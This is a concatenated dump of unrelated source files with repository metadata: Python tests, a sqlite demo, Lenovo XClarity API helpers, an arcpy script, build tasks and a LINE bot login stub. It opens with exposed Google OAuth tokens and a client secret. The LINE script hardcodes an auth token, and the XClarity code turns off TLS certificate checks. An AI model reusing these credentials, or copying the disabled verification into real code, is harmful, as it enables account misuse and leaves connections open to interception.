"eyJhbGciOiJSUzI1NiIsImtpZCI6IjEzNmNiM2M5ZGI1M2Y5NjI3MTJkYWFjMTlkNTdiYmU2YjlhZWE1ZTcifQ.eyJpc3MiOiJhY2NvdW50cy5nb29nbGUuY29tIiwiYXRfaGFzaCI6IkRzRDB3ZjlQY1c1dEtIZUVOM01DVEEiLCJhdWQiOiI2NDcxMDQ5NjA0MDctcmk0b3AxNWxucjJtaDk2NHJsZXF1M2Zmc2xpbnU5cHMuYXBwcy5nb29nbGV1c2VyY29udGVudC5jb20iLCJzdWIiOiIxMDY0NjM1NjMzODY1MTg3ODE3MTciLCJlbWFpbF92ZXJpZmllZCI6dHJ1ZSwiYXpwIjoiNjQ3MTA0OTYwNDA3LXJpNG9wMTVsbnIybWg5NjRybGVxdTNmZnNsaW51OXBzLmFwcHMuZ29vZ2xldXNlcmNvbnRlbnQuY29tIiwiZW1haWwiOiJrcml2aWNoLmVrYXRlcmluYUBnbWFpbC5jb20iLCJpYXQiOjE0NDAxNDA1NTUsImV4cCI6MTQ0MDE0NDE1NX0.AmhN0q9-uLvTQ5nmfghFUaXeIPKIYoS4Sy25i4fFzfd2ns0akw52B5_58g1QyRVh_L7fCsq4WMOY98FvssZM24pUp2GgbbxjVelPZzwb6TZ8jjcjeF6N9r_PXKe08_23O2X20ZR3HDKPRBDCGjtQ9aIcsXE3v6fVQsXEoLxhWkrpUn9d2nJOz8twh2v9BSFafoAZCA2P9qnKgcZu_hJMgUtgK-rJF3Xo1xkUa71mbmIBBEVMHNJAOddSU3XKW5P0fQ7loEl_xhtfnuxiC_Bar5Azkl9I-1FaXMPn_ozjvDwv4tXYwmRe2xxCdlH3fD5zFtiQrXx8jLNa4K6JSb0YdA", "access_token": "ya29.1gFV0ahoz5YPCGum3iq1ghMPzK10TYeBBNcqOsReGCV-sb9CMl8gL8V7MJDyAR1K4ChLng", "expires_in": 3600, "token_type": "Bearer"}, "refresh_token": "null", "token_uri": "https://accounts.google.com/o/oauth2/token", "client_secret": "CfGty_X7fQACweNzZKo2i9YG", "revoke_uri": "https://accounts.google.com/o/oauth2/revoke", "access_token": "ya29.1gFV0ahoz5YPCGum3iq1ghMPzK10TYeBBNcqOsReGCV-sb9CMl8gL8V7MJDyAR1K4ChLng", "token_expiry": "2015-08-21T08:02:35Z", "invalid": "false", "user_agent": "null", "_class": "OAuth2Credentials", "client_id": "647104960407-ri4op15lnr2mh964rlequ3ffslinu9ps.apps.googleusercontent.com"}'
| [
"krivich.ekaterina@gmail.com"
] | krivich.ekaterina@gmail.com |
5f2ce7121fa780c80dfe8ccdb8e31d4f67ad3753 | 56abd8f94a511ae0d163161cb2f5e0a91d4b8bed | /datahub/investment/test/test_validate.py | 1a5ffaa2fa0b35879bda1a796d8eb999cd128ab5 | [
"MIT"
] | permissive | cgsunkel/data-hub-api | 994c58bd975d902bf2bc44b415a5892919ff4539 | a92faabf73fb93b5bfd94fd465eafc3e29aa6d8e | refs/heads/develop | 2023-05-31T22:35:56.344904 | 2021-06-30T11:23:06 | 2021-06-30T11:23:06 | 303,947,456 | 0 | 0 | MIT | 2021-06-30T10:34:50 | 2020-10-14T08:14:46 | Python | UTF-8 | Python | false | false | 1,477 | py | from datetime import date
import pytest
from freezegun import freeze_time
from datahub.investment.validate import (
_is_provided_and_is_date_in_the_past,
is_provided_and_is_date_less_than_a_year_ago,
)
@pytest.mark.parametrize(
'data_date,expected_result',
(
(
date(2019, 2, 2),
False,
),
(
date(2019, 2, 1),
True,
),
(
date(2019, 1, 31),
True,
),
(
None,
False,
),
),
)
@freeze_time('2019-02-01')
def test_is_date_in_the_past(data_date, expected_result):
"""Tests that a given date is in the past."""
assert _is_provided_and_is_date_in_the_past(data_date) is expected_result
@pytest.mark.parametrize(
'post_data,expected_result',
(
(
date(2019, 2, 1),
True,
),
(
date(2019, 2, 2),
False,
),
(
date(2019, 1, 31),
True,
),
(
date(2017, 9, 30),
False,
),
(
None,
False,
),
(
{},
False,
),
),
)
@freeze_time('2019-02-01')
def test_is_date_less_than_a_year_ago(post_data, expected_result):
"""Tests if a given date is within the last year."""
assert is_provided_and_is_date_less_than_a_year_ago(post_data) is expected_result
| [
"marcus.patino-pan@digital.trade.gov.uk"
] | marcus.patino-pan@digital.trade.gov.uk |
96c42184cc0925686a9b9a85d6043098400f1cda | ec910a38e5b51fc6314337cdd90e7729071cd9dc | /sqla.py | 4adb4bfa4ed8c26c6d904f058ea685f7140edb61 | [] | no_license | silvercoder1/sql-hacking | 1acd18e66bc0f420a087d7418bf5e9372d7cd1ae | aa9c1a039310f90d5be045c4c4023bf1908ba0c3 | refs/heads/master | 2016-09-05T10:24:08.957712 | 2015-08-27T02:32:32 | 2015-08-27T02:32:32 | 41,395,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,105 | py | import sqlite3, csv
CITIES = [('Boston', 'MA', 600000),
('Los Angeles', 'CA', 38000000),
('Houston', 'TX', 2100000),
('Philadelphia', 'PA', 1500000),
('San Antonio', 'TX', 1400000),
('San Diego', 'CA', 130000),
('Dallas', 'TX', 1200000),
('San Jose', 'CA', 900000),
('Jacksonville', 'FL', 800000),
('Indianapolis', 'IN', 800000),
('Austin', 'TX', 800000),
('Detroit', 'MI', 700000)]
regions = [
('New York City', 'Northeast'),
('San Francisco', 'West'),
('Chicago', 'Midwest'),
('Houston', 'South'),
('Phoenix', 'West'),
('Boston', 'Northeast'),
('Los Angeles', 'West'),
('Houston', 'South'),
('Philadelphia', 'Northeast'),
('San Antonio', 'South'),
('San Diego', 'West'),
('Dallas', 'South'),
('San Jose', 'West'),
('Jacksonville', 'South'),
('Indianapolis', 'Midwest'),
('Austin', 'South'),
('Detroit', 'Midwest')
]
with sqlite3.connect("new.db") as conn:
cur = conn.cursor()
'''try:
cur.execute("DROP TABLE IF EXISTS population")
cur.execute("DROP TABLE IF EXISTS regions")
cur.execute("CREATE TABLE population(city TEXT, state TEXT, population INT)")
cur.execute("CREATE TABLE regions(city TEXT, region TEXT)")
except sqlite3.OperationalError:
print "table already exists"
try:
cur.executemany('INSERT INTO population VALUES(?, ?, ?)', CITIES)
cur.executemany('INSERT INTO regions VALUES(?, ?)', regions)
except sqlite3.OperationalError as e:
print "city and/or region data already exists"
print e'''
cur.execute('''SELECT DISTINCT population.city, population.population, regions.region FROM
population,regions WHERE population.city=regions.city ORDER BY population.city ASC''')
rows = cur.fetchall()
for row in rows:
print row[0], row[1], row[2]
| [
"vikrambahl@svram.local"
] | vikrambahl@svram.local |
19f2f4ba687e70f40c6c6684f09ea6f92ba1cdce | dd018e9d6777e26aa759fe4efc01ae8ba344a39f | /.PyCharmCE2018.1/system/python_stubs/-1247971763/hpmudext.py | ec355ad6f857fae7ce8789bc58faa8573e268962 | [] | no_license | sofiajatsunda/lits--project | d2ffafd021b6815f72287dd52af33aa63607064b | 2fb4c165e74491eb6e26606ff481c7c5c54c9ed5 | refs/heads/master | 2020-03-21T09:15:03.786745 | 2018-06-23T10:01:19 | 2018-06-23T10:01:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,839 | py | # encoding: utf-8
# module hpmudext
# from /usr/lib/python3/dist-packages/hpmudext.cpython-36m-x86_64-linux-gnu.so
# by generator 1.145
""" Python extension for HP multi-point transport driver """
# no imports
# Variables with simple values
HPMUD_BUFFER_SIZE = 16384
HPMUD_BUS_ALL = 3
HPMUD_BUS_NA = 0
HPMUD_BUS_PARALLEL = 2
HPMUD_BUS_USB = 1
HPMUD_DOT4_BRIDGE_MODE = 5
HPMUD_DOT4_MODE = 3
HPMUD_DOT4_PHOENIX_MODE = 4
HPMUD_MLC_GUSHER_MODE = 6
HPMUD_MLC_MISER_MODE = 7
HPMUD_RAW_MODE = 1
HPMUD_R_DATFILE_ERROR = 48
HPMUD_R_DEVICE_BUSY = 21
HPMUD_R_INVALID_CHANNEL_ID = 30
HPMUD_R_INVALID_DESCRIPTOR = 3
HPMUD_R_INVALID_DEVICE = 2
HPMUD_R_INVALID_DEVICE_NODE = 38
HPMUD_R_INVALID_DEVICE_OPEN = 37
HPMUD_R_INVALID_IP = 45
HPMUD_R_INVALID_IP_PORT = 46
HPMUD_R_INVALID_LENGTH = 8
HPMUD_R_INVALID_SN = 28
HPMUD_R_INVALID_STATE = 31
HPMUD_R_INVALID_TIMEOUT = 47
HPMUD_R_INVALID_URI = 4
HPMUD_R_IO_ERROR = 12
HPMUD_R_IO_TIMEOUT = 49
HPMUD_R_OK = 0
HPMUD_S_CONFIG_DOWNLOAD_CHANNEL = 'HP-CONFIGURATION-DOWNLOAD'
HPMUD_S_CONFIG_UPLOAD_CHANNEL = 'HP-CONFIGURATION-UPLOAD'
HPMUD_S_DEVMGMT_CHANNEL = 'HP-DEVMGMT'
HPMUD_S_EWS_CHANNEL = 'HP-EWS'
HPMUD_S_EWS_LEDM_CHANNEL = 'HP-EWS-LEDM'
HPMUD_S_FAX_SEND_CHANNEL = 'HP-FAX-SEND'
HPMUD_S_LEDM_SCAN = 'HP-LEDM-SCAN'
HPMUD_S_MARVELL_EWS_CHANNEL = 'HP-MARVELL-EWS'
HPMUD_S_MARVELL_FAX_CHANNEL = 'HP-MARVELL-FAX'
HPMUD_S_MEMORY_CARD_CHANNEL = 'HP-CARD-ACCESS'
HPMUD_S_PML_CHANNEL = 'HP-MESSAGE'
HPMUD_S_PRINT_CHANNEL = 'PRINT'
HPMUD_S_SCAN_CHANNEL = 'HP-SCAN'
HPMUD_S_SOAP_FAX = 'HP-SOAP-FAX'
HPMUD_S_SOAP_SCAN = 'HP-SOAP-SCAN'
HPMUD_S_WIFI_CHANNEL = 'HP-WIFICONFIG'
HPMUD_UNI_MODE = 0
# functions
def close_channel(*args, **kwargs): # real signature unknown
pass
def close_device(*args, **kwargs): # real signature unknown
pass
def get_device_id(*args, **kwargs): # real signature unknown
pass
def get_pml(*args, **kwargs): # real signature unknown
pass
def get_zc_ip_address(*args, **kwargs): # real signature unknown
pass
def make_net_uri(*args, **kwargs): # real signature unknown
pass
def make_par_uri(*args, **kwargs): # real signature unknown
pass
def make_usb_uri(*args, **kwargs): # real signature unknown
pass
def make_zc_uri(*args, **kwargs): # real signature unknown
pass
def open_channel(*args, **kwargs): # real signature unknown
pass
def open_device(*args, **kwargs): # real signature unknown
pass
def probe_devices(*args, **kwargs): # real signature unknown
pass
def read_channel(*args, **kwargs): # real signature unknown
pass
def set_pml(*args, **kwargs): # real signature unknown
pass
def write_channel(*args, **kwargs): # real signature unknown
pass
# no classes
# variables with complex values
__loader__ = None # (!) real value is ''
__spec__ = None # (!) real value is ''
| [
"jatsundasofia@gmail.com"
] | jatsundasofia@gmail.com |
5651ce9ae2806cf432014fe0af9498228b65bb12 | 2b9c73b27448232644390295c1dc25a6168322ff | /01012020/Client1.py | d5dc206635f19def5a80b664a1abb88e6b7a1bc6 | [] | no_license | Genesisalarcon1998/csp-exercises | 372f1166aa7f9049e30160ed75143600dda588bf | 5ed942036517ddd0ca3d4875bb4c1839bbd80088 | refs/heads/master | 2020-12-19T03:26:39.997294 | 2020-02-10T16:29:46 | 2020-02-10T16:29:46 | 232,543,064 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((socket.gethostname(), 1025))
complete_info = ''
while True:
msg = s.recv(7)
if len (msg) <= 0:
break
complete_info += msg.decode("utf-8")
print(complete_info) | [
"Genesisalarcon1998@gmail.com"
] | Genesisalarcon1998@gmail.com |
0eb6a89c5f5aa4482f1b13a94ec4c7090b573a4c | 168126e419a9454dd6ecfad699ea0c8602765649 | /xcapy/data/xclarity.py | 037e9719cb480028ee26acdb3dbc900f847543c0 | [] | no_license | andrewCluey/lenovoPy | fffb66bc7b3d380a919d720185fc31ed9fe98837 | cfcea841f12b30542a56f7d1cd315f574093fe49 | refs/heads/master | 2020-06-13T15:43:08.970847 | 2019-07-07T11:57:37 | 2019-07-07T11:57:37 | 194,698,603 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,945 | py | # Written by Andrew Clure
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# These functions are intended to be re-used and imported into other scripts.
# Each function has a brief description of what it does.
#
import requests
from requests.auth import HTTPBasicAuth
import json
import urllib3
import getpass
import argparse
import atexit
import ssl
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
api_url = 'https://192.168.10.43'
api_user = 'pylxca'
#api_pass = getpass.getpass(prompt='Enter your password: ')
api_pass = ''
#r = requests.get(f'{api_url}/aicc', auth=(api_user,api_pass),verify=False)
#print(r.text)
#print(r.status_code)
#print(r.json())
def xca_discovered(username,password,url):
''' gets a list of devices that have been discovered '''
print(f'authenticating to {url} for user: {username}')
response = requests.get(
f'{url}/discovery', auth=(username,password),verify=False)
if response.status_code != 200:
print(f'ERROR! API responded with: {response.status_code}')
return
return response.json()
def xca_storedcred(username,password,url):
''' Gets a list of all the stored credentials for managing devices '''
response = requests.get(
f'{url}/storedCredentials', auth=(username,password),verify=False)
if response.status_code != 200:
print(f'ERROR! API responded with: {response.status_code}')
return
return response.json()
def xca_discoverdev(username,password,url,devip):
''' discovers devices to be managed '''
payload = {"ipAddresses": "{devip}"}
response = requests.post(
f'{url}/discoverRequest',
auth=(username,password),
verify=False,
data=payload
)
if response.status_code != 200:
print(f'ERROR! API responded with: {response.status_code}')
return
return response.headers
print(payload)
print(response.headers)
def xca_managedev(username,password,url,devip):
''' discovers devices to be managed '''
payload = [{
"ipAddresses": [devip],
"forceManage": True,
"type": "Rack-Tower Server",
"securityDescriptor": {
"managedAuthEnabled": False,
"storedCredentials": {
"id" : "16302"
}
}
}]
response = requests.post(
f'{url}/manageRequest?discovery=false',
auth=(username,password),
data=json.dumps(payload),
verify=False
)
if response.status_code != 200:
print(f'ERROR! API responded with: {response.status_code}. {response.text}')
print(payload)
return
return response.headers
def xca_newuser(username,password,url,newuser,userpw):
''' discovers devices to be managed '''
payload = {
"userPw": "Passw0rd",
"userName": "testUser",
"description": "New User account created by pyLXCA",
"groups": ["LXC-ADMIN"],
"PasswordChangeFirstAccess": True
}
response = requests.post(
f'{url}/userAccounts',
auth=(username,password),
data=json.dumps(payload),
verify=False)
if response.status_code != 201:
print(f'ERROR! API responded with: {response.status_code}. {response.text}')
print(payload)
return response.text
return
return response.json()
#xca_newuser(api_user,api_pass,api_url,'testuser','Passw0rd')
#xca_managedev(api_user,api_pass,api_url,'192.168.10.66')
| [
"aclure@globalprocessing.net"
] | aclure@globalprocessing.net |
9202934aa4dc5ccfd0cc0fc595d2dcecdeae1ff0 | 6bb8cbacd2e79264b7c8276f209977eb3c7d84a8 | /Backup/WSEL_XS_Check.py | 898b9455b6488442eadada08692efdd12e93670d | [] | no_license | bmulcahy/WSEL-Python-Tool | 8042e4eab54829310b356bf3cb6ecd9b1f3a4492 | 5818554dab4b27c0dfc9bac960d666226c23df06 | refs/heads/master | 2016-08-11T20:36:52.704073 | 2015-11-25T21:30:19 | 2015-11-25T21:30:19 | 44,610,691 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,366 | py | from __future__ import print_function
import sys, os, re, arcpy
from arcpy import env
class WSEL_XS_Check:
def __init__(self, config, streams):
self.streams = streams
self.config = config
def __enter__(self):
self.scratchgdb = self.config['scratchgdb']
self.xs_original = self.config['xs_original']
self.xs_dataset = self.config['xs_dataset']
self.streams_original = self.config['streams_original']
self.xs_intersect_dataset = self.config['xs_intersect_dataset']
self.routes_dataset = self.config['routes_dataset']
self.streams_dataset = self.config['streams_dataset']
self.vertices_dataset = self.config['vertices_dataset']
env.workspace = self.scratchgdb
env.overwriteOutput = True
env.MResolution = 0.0001
env.MDomain = "0 10000000"
env.outputMFlag = "Enabled"
env.outputZFlag = "Enabled"
return self
def __exit__(self, type, value, traceback):
return self.warnings
def xs_check(self, xs, name):
warning ={name:[]}
expression = "[WSE]"
arcpy.AddField_management(xs,'Valid',"Double")
arcpy.AddField_management(xs,'WSEL',"DOUBLE")
arcpy.AddField_management(xs,'WSEL_REG',"DOUBLE")
arcpy.CalculateField_management(xs, 'WSEL', expression, "VB")
arcpy.CalculateField_management(xs, "WSEL_REG", expression, "VB")
arcpy.CalculateField_management(xs, 'Valid', "0", "VB")
cursor = arcpy.UpdateCursor(xs, fields='Section; WSE; Valid; WSEL',sort_fields="Section A")
count = arcpy.GetCount_management(xs).getOutput(0)
i=0
error = 0
prevrow =''
for row in cursor:
wsel = row.getValue('WSE')
section =row.getValue('Section')
if section == 0:
row.setValue("Valid",1)
row.setValue("Section",0.001)
cursor.updateRow(row)
if i == 0:
prevrow = wsel
if i != 0:
previous = prevrow
if previous> wsel:
error = error + 1
section = row.getValue('Section')
#print("Section: " + str(section) + " invalid")
row.setValue("Valid",1)
row.setValue("WSEL",previous+0.001)
warning[name].append(section)
cursor.updateRow(row)
wsel = row.getValue('WSE')
prevrow = wsel
i=i+1
del row
del cursor
if error != 0:
return warning
else:
return 'null'
def processStream(self):
self.warnings=[]
for stream in self.streams:
sep = '_'
name = stream.split(sep, 1)[0]
#print("Starting stream "+name)
xs = arcpy.FeatureToLine_management(self.xs_original+"\\"+name+"_xs", self.xs_dataset+"\\"+name+"_xs")
warning = self.xs_check(xs, name)
if warning != 'null':
self.warnings.append(warning)
#print("Finished stream "+name)
return self.warnings
| [
"brian.mulcahy@stantec.com"
] | brian.mulcahy@stantec.com |
5f78e405f573ff85376a83454adda0f77c715adc | a2d3367988bf9285f975b64a83d0e1050c24ab9c | /app/apps.py | 7ecbb87e9a9af02814e0a34e2ce346fc577c9735 | [] | no_license | Lyss74/AboutsGoodsApp | 9cfb75ccc78b51785979cdc09a97803b204b4a70 | 7a5274b7db944adfd41619ffc7cc951e11a33f62 | refs/heads/master | 2022-12-13T09:22:57.573922 | 2019-07-01T07:55:12 | 2019-07-01T07:55:12 | 194,542,619 | 1 | 0 | null | 2022-12-08T05:50:05 | 2019-06-30T17:24:18 | Python | UTF-8 | Python | false | false | 82 | py |
from django.apps import AppConfig
class AppConfig(AppConfig):
name = 'app'
| [
"LyssProGm@gmail.com"
] | LyssProGm@gmail.com |
cec93e40fbfa31c0efdba8beccb93ed57d76dd43 | 192f639939307313737969763ccbdbaa68352317 | /faasmcli/faasmcli/tasks/dev.py | fdaafa09de4990ee4cd73d18d7d3adb7e0cca69a | [
"Apache-2.0"
] | permissive | mkvoya/faasm | 90f0fee34377266ce162f1583b7ddd21a43f30f6 | 6d85a5507a2ce10fcd0c486251e1d26c0e013e28 | refs/heads/master | 2022-12-28T23:22:28.128943 | 2020-10-21T18:53:24 | 2020-10-21T18:53:24 | 306,117,491 | 0 | 0 | Apache-2.0 | 2020-10-21T18:45:48 | 2020-10-21T18:45:46 | null | UTF-8 | Python | false | false | 1,087 | py | from os import makedirs
from os.path import join, exists
from shutil import rmtree
from subprocess import run
from invoke import task
from faasmcli.util.env import PROJ_ROOT
_BUILD_DIR = join(PROJ_ROOT, "build", "cmake")
_BIN_DIR = join(_BUILD_DIR, "bin")
@task
def cmake(ctx, clean=False):
if clean and exists(_BUILD_DIR):
rmtree(_BUILD_DIR)
if not exists(_BUILD_DIR):
makedirs(_BUILD_DIR)
cmd = [
"cmake",
"-GNinja",
"-DCMAKE_BUILD_TYPE=Debug",
"-DCMAKE_CXX_COMPILER=/usr/bin/clang++-10",
"-DCMAKE_C_COMPILER=/usr/bin/clang-10",
"../..",
]
run(" ".join(cmd), shell=True, cwd=_BUILD_DIR)
@task
def cc(ctx, target, clean=False):
if clean:
if exists(_BUILD_DIR):
rmtree(_BUILD_DIR)
cmake(ctx, clean=True)
if target == "all":
target = ""
run(
"ninja {}".format(target),
cwd=_BUILD_DIR,
shell=True,
)
@task
def r(ctx, target):
run(
"./{}".format(target),
cwd=_BIN_DIR,
shell=True,
)
| [
"noreply@github.com"
] | noreply@github.com |
234cc309b974c4a2bb21e97ad291e8d31267e23e | 41539db14285975508d689e1fa1153b338bf6f50 | /Chapter2/les3_2_example.py | f4c308426aa4717ff25926b6dd90c7f4bc3dbfb2 | [] | no_license | dushkinalexandr/stepik_automation_test_selenium | 4254bb2fac76ebc14fa40c64ab6dffe35a9e6ba5 | 82fa2a2cbcc88957e4f31c326524006ef9ccfcc6 | refs/heads/main | 2023-03-29T23:25:17.448944 | 2021-04-06T10:12:09 | 2021-04-06T10:12:09 | 318,863,701 | 0 | 0 | null | 2021-04-06T10:12:09 | 2020-12-05T18:45:07 | Python | UTF-8 | Python | false | false | 386 | py | from selenium import webdriver
import time
browser = webdriver.Firefox()
try:
link = 'http://ya.ru'
browser.get(link)
time.sleep(2)
browser.execute_script("prompt('Hello!');")
prompt = browser.switch_to.alert
time.sleep(2)
prompt.send_keys("OKI DOKI lolololadasdasdasd")
time.sleep(2)
prompt.accept()
finally:
time.sleep(2)
browser.quit()
| [
"ku.wurm@google.com"
] | ku.wurm@google.com |
2c0c9016bb987cc12c64f4dbc7a964a54b1ab1b3 | ebf072232818145211ba444bdf6f5567b87a7086 | /Workingproject.py | a5dbd40a8d99e54ea350ec54b880b1fd6bb0f60d | [] | no_license | lucywebster/thesisproject | c5a0954d946b5c1c0364de3423d289fc9d13944e | e6651d8373e64c9d65e50cde24d09573110e0f4a | refs/heads/master | 2021-06-02T12:07:05.905768 | 2018-11-02T03:56:56 | 2018-11-02T03:56:56 | 135,812,905 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,996 | py | #!/usr/bin/env python
#
# The following program has been written by Lucy Webster, 09154752, for the purpose of
# BEB801 Project, Intergenerational Language Transmission at QUT
#
# The file will allow read and write on to RFID cards
import RPi.GPIO as GPIO
import MFRC522
import signal
import simpleaudio as sa
import pyaudio
import wave
import SimpleMFRC522
from time import sleep
p = pyaudio.PyAudio()
reader = SimpleMFRC522.SimpleMFRC522()
CHUNK = 2048
FORMAT = pyaudio.paInt16
CHANNELS = 2
RATE = 44100
RECORD_SECONDS = 5
continue_reading = True
card_empty = False
def check(fileid):
datafile = open("Audio/record.txt","r")
for line in datafile:
if "{0}".format(str(fileid)) in line:
datafile.close()
return True
datafile.close()
return False
try:
while continue_reading:
print("Scan Tag!")
wavScan = sa.WaveObject.from_wave_file("beeps/scan.wav")
player = wavScan.play()
player.wait_done()
playbackfile = open("Audio/record.txt","r")
id,text = reader.read()
search = "Audio/{0}.wav".format(str(id))
if check(id) == False:
print("not there")
playbackfile.close()
recordfile = open("Audio/record.txt","a+")
WAVE_OUTPUT_FILENAME ="Audio/"+str(id)+".wav"
sleep(1)
stream = p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK)
print("Recording!")
wavRec = sa.WaveObject.from_wave_file("beeps/recording.wav")
player = wavRec.play()
player.wait_done()
sleep(1)
frames = []
for ii in range(0, int(RATE / CHUNK * RECORD_SECONDS)):
data = stream.read(CHUNK)
frames.append(data)
print("Done!")
stream.stop_stream()
stream.close()
# p.terminate()
wf = wave.open(WAVE_OUTPUT_FILENAME , 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(p.get_sample_size(FORMAT))
wf.setframerate(RATE)
wf.writeframes(b''.join(frames))
recordfile.write("AudioFile: "+str(id)+".wav"+"\n \n")
recordfile.close()
else:
print ("true")
print("Playing "+search)
wavObj = sa.WaveObject.from_wave_file(search)
player = wavObj.play()
player.wait_done()
playbackfile.close()
sleep(1)
card_empty = False
except KeyboardInterrupt:
print("Finish!")
GPIO.cleanup()
| [
"lucyapril96@gmail.com"
] | lucyapril96@gmail.com |
5ec906a7f13bfe9363c263fa69b23f71a96dfda7 | 5aa74b5186866495f9c43a7ada539e155d239d15 | /aud.py | 3de6a8b7501971ca53b0b3facecbea05c8c795e5 | [] | no_license | iWebster28/wavechord | 3dcc15eee6181a1d22009ae31f7f94b9072943c6 | 1b511d82482c5bc747082bebd07b1f6fc025a224 | refs/heads/master | 2023-03-08T21:30:51.517589 | 2021-02-21T18:45:36 | 2021-02-21T18:45:36 | 340,582,568 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 55 | py | import pyaudiotest as pa
root = 49
pa.play_note(root) | [
"IanWebster2828@gmail.com"
] | IanWebster2828@gmail.com |
4ec56b65a6d1c32f1b71a88f3d3e179a2047d363 | c6962356ba66835e7173f4386ae6fb47cf55e38b | /batch_normalize_volume/get_max_volume.py | 52a5558aeb636b09698dba264662979cf583d487 | [] | no_license | ethanweed/Speech-scripts | d90e59dc09a5749feb6ea5a4279601d6fb9b6648 | 6435d2b5eb4af4a8ec0b1283f67119a181bba208 | refs/heads/master | 2022-03-22T02:28:30.320594 | 2022-03-04T09:04:08 | 2022-03-04T09:04:08 | 172,110,760 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 648 | py | #read file into python
# Ethan Weed
# Spring 2019
# get maximum volume from file "read_volume.txt"
# find gain needed to add to bring dB to zero
# save output as "gain_adjust.txt"
import os
pathin = 'path/to/read_volume/file'
file = 'read_volume.txt'
os.chdir(pathin)
with open(file,'r') as f:
text = f.read()
text = text.split('\n')
maxvol = text[27]
maxvol = ''.join(maxvol)
maxvol = maxvol.split()
maxvol = maxvol[4]
maxvol = float(maxvol)
# reduce 0 to e.g. -5 or less if the output files are getting clipped
gain_adjust = str(0-maxvol)
with open('gain_adjust.txt', 'a+') as newfile:
newfile.write(gain_adjust)
newfile.close()
| [
"weed.ethan@gmail.com"
] | weed.ethan@gmail.com |
3d707d21c6ac16799a945bce65e9006254cfa68b | 4c8c9e3648371091fa523d5487542e6a6f200fbd | /TestPython1/src/com/caibo/api/Log.py | d10d432251f4543906b8c358b3803f71c9229e9b | [] | no_license | zhonglekeji/AutoTest | f32bd00802096999f7057ec244ca29a83072fee9 | 73169d47e169cab0a1e854d2b3b0fda43fea6dd5 | refs/heads/master | 2020-04-16T01:29:21.446021 | 2019-01-23T06:38:14 | 2019-01-23T06:38:14 | 165,175,606 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 888 | py | # -*- coding: utf-8 -*-
class Log:
def print_case_info_Login(self,mobile,pwd,mes):
print('执行登录相关测试用例:\n'+mes+'\n参数:\n'+'mobile:'+mobile+'\n'+'pwd:'+pwd)
pass
def print_case_info_My(self,mes):
print("执行测试用例:\n"+mes)
pass
def print_case_info_identity(self,rel_name,rel_card,mes):
print('执行实名认证相关测试用例:\n'+mes+'\n参数:\n'+'name:'+rel_name+'\n'+'card:'+rel_card)
pass
def print_case_info_get_code(self,mobile,case_name):
print('执行根据手机号获取验证码相关测试用例:\n'+case_name+'\n参数:\n'+'mobile:'+mobile)
pass
def print_case_info_recharge(self,amount,case_name):
print('执行充值相关测试用例:\n'+case_name+'\n参数:\n'+'金额:'+amount)
pass | [
"zhixiegoulbcnj@gmail.com"
] | zhixiegoulbcnj@gmail.com |
a65372cb81c7b03b6c39d5f50a614eb3fe350d61 | ebfcae1c5ba2997b2ac4471d5bedc3f5daffcb31 | /repos/flaskTs-master/app/email.py | 9203880e1598384e4a0187a41bb57893fba8264d | [] | no_license | babiato/flaskapp1 | 84de2d0b26a54f5820d3bbe97926782ad41e005c | 530beb9e3b8516e0e93960b99521c23a523ef546 | refs/heads/master | 2023-02-26T16:36:49.760632 | 2021-02-04T09:08:40 | 2021-02-04T09:08:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 351 | py | from flask_mail import Message
from app import mail
from flask import render_template
def send_email(to,subject,template,**kwargs):
msg=Message("[TecnologyDreamer]"+subject,sender='879651072@qq.com',recipients=[to])
msg.body=render_template(template+'.txt',**kwargs)
msg.html=render_template(template+'.html',**kwargs)
mail.send(msg)
| [
"jinxufang@tencent.com"
] | jinxufang@tencent.com |
0e13b665b65fffad36965d6b06a4b06237bab28b | 77a5b14525d495edac238d2da5ee3a3658b25373 | /1.py | 163e42d8f8d0181cc7fd5418691a330eef027ff4 | [] | no_license | lee25122529/Arlee.-py3 | 5a8fb1c0c600e0c0bfb68c576b505ee249c3e7fe | 1b60eda2e4665ca34a65acd0ba8306a51f4580eb | refs/heads/master | 2020-03-21T03:14:16.758466 | 2018-07-02T23:33:17 | 2018-07-02T23:33:17 | 138,043,261 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 210,780 | py | # -*- coding: utf-8 -*-
from linepy import *
from akad.ttypes import *
from multiprocessing import Pool, Process
from datetime import datetime
from time import sleep
from bs4 import BeautifulSoup
from humanfriendly import format_timespan, format_size, format_number, format_length
import time, random, sys, json, codecs, threading, glob, re, string, os, requests, subprocess, six, ast, pytz, urllib.request, urllib.parse, urllib.error, urllib.parse
from gtts import gTTS
import html5lib,shutil
import wikipedia,goslate
import youtube_dl, pafy, asyncio
from multiprocessing import Pool, Process
from googletrans import Translator
#==============================================================================#
botStart = time.time()
#==============================================================================#
line = LINE("EtMApw8sq4koJ74nlYN3.IgHHjqwO8kcNaIKBDwPf8W.yZQKQtE/zzl2u0+JaCF8+mwFpvDh6natCKmD2nQvnTc=")
line.log("Auth Token : " + str(line.authToken))
line.log("Timeline Token : " + str(line.tl.channelAccessToken))
# ki = LINE()
# ki.log("Auth Token : " + str(ki.authToken))
# ki.log("Timeline Token : " + str(ki.tl.channelAccessToken))
# kk = LINE()
# kk.log("Auth Token : " + str(kk.authToken))
# kk.log("Timeline Token : " + str(kk.tl.channelAccessToken))
# kc = LINE()
# kc.log("Auth Token : " + str(kc.authToken))
# kc.log("Timeline Token : " + str(kc.tl.channelAccessToken))
# ke = LINE()
# ke.log("Auth Token : " + str(ke.authToken))
# ke.log("Timeline Token : " + str(ke.tl.channelAccessToken))
print ("Login Succes")
